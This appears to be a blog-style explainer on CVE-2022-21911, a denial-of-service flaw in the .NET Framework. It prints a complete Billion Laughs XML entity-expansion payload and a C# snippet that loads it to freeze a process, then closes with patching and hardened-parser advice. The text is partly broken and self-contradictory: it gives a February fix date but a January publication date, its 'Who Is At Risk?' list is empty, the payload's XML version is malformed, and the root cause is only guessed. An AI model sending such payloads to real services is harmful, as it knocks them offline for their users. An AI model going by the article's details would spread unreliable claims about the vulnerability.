CVE-2022-21911 - How .NET Framework Applications Can Be Taken Down by a Tiny Request

In early 2022, Microsoft revealed a serious vulnerability affecting the .NET Framework. Labeled as CVE-2022-21911, this security bug lets someone on the internet freeze your .NET application, taking it offline for everyone else. In the ever-growing world of web apps and APIs built in .NET, this was a big deal. This post walks step by step through what went wrong, how attackers can use it, and, most importantly, how to protect your software.

What Is CVE-2022-21911?

CVE-2022-21911 is an official identifier for a *Denial of Service* (DoS) vulnerability in the .NET Framework. That means a bad actor doesn’t need to steal data or break into your servers. Instead, they just have to *break your service* by making it crash or hang indefinitely.

Vendor: Microsoft  
Product: Microsoft .NET Framework 4.8, 4.7.2  
Impact: Denial of Service  
Attack vector: Remote (over the network)  
Fix available: Yes (Released February 8, 2022)  
Microsoft advisory: MSRC CVE-2022-21911

A Simple Mistake With Heavy Consequences

What Caused the Vulnerability?  
The root problem is how the .NET Framework’s XML parsing system (specifically System.Xml) handled some malformed or deeply nested XML files. Certain crafted inputs would cause the parser to go into an infinite recursion or consume a massive amount of resources, such as memory and CPU, eventually hanging or crashing the process.

Here’s a basic, non-malicious example of XML parsing in C#

using System;
using System.Xml;

class Program
{
    static void Main()
    {
        string xml = @"<root><child>I am safe</child></root>";
        XmlDocument doc = new XmlDocument();
        doc.LoadXml(xml);
        Console.WriteLine(doc.OuterXml);
    }
}

This works fine with normal XML. But malicious XML can be constructed to cause serious trouble.

The Exploit: Tiny Request, Total Freeze

How Could an Attacker Use This?  
Attackers would send very carefully prepared XML documents designed to “break” the parser. The specifics might involve:

- Billion Laughs Attack: An XML bomb that expands entities so many times the parser runs out of memory.
- Deeply Nested Tags: Crafting a document with thousands of levels of <tag><tag><tag>...</tag></tag></tag>, causing a stack overflow or parsing hang.

Example: Malicious Input (Billion Laughs)

<?xml version="1."?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

If you send this malicious XML to an unpatched .NET application that uses the default XML parser, you might see the process memory balloon and then crash or freeze.

Sample DoS C# Code

using System.Xml;

class Program
{
    static void Main()
    {
        // Open your app to this incoming "bomb":
        string xml = System.IO.File.ReadAllText("billion_laughs.xml");
        var doc = new XmlDocument();
        doc.LoadXml(xml); // This line will hang or crash
    }
}

Who Is At Risk?

If you’re using the .NET Framework (not .NET Core/5/6+), especially versions 4.7.2 and 4.8 and your application:

How Bad Was This (CVSS score)?

CVSS Score: 7.5 (High)
- *Why?* Because the attack is easy to perform, needs no authentication, and can take down critical applications.

How Do I Fix It?

1. Update the .NET Framework  
Microsoft released patches in February 2022.  
Get the patch here:  
- 2022-02 Security and Quality Rollup for .NET Framework

2. Harden XML Parsing

Safer XML Parsing Example

using System.Xml;

var settings = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Prohibit, // Blocks both Billion Laughs and nested entity exploits
    MaxCharactersFromEntities = 1024        // Protect against expansion attacks
};

using (var reader = XmlReader.Create("input.xml", settings))
{
    var doc = new XmlDocument();
    doc.Load(reader);
}

Final Thoughts

CVE-2022-21911 proves that just parsing a file or a chunk of text can pose a huge risk to any web service, API, or even a background task. Denial of Service bugs like this don't require fancy hacks—just the right (or wrong) input. Always keep your frameworks updated, and never trust input from users, even if it seems as innocent as a file upload.

Further Reading

- Microsoft Security Advisory CVE-2022-21911
- OWASP XML External Entity (XXE) Prevention Cheat Sheet

Timeline

Published on: 01/11/2022 21:15:00 UTC
Last modified on: 05/23/2022 17:29:00 UTC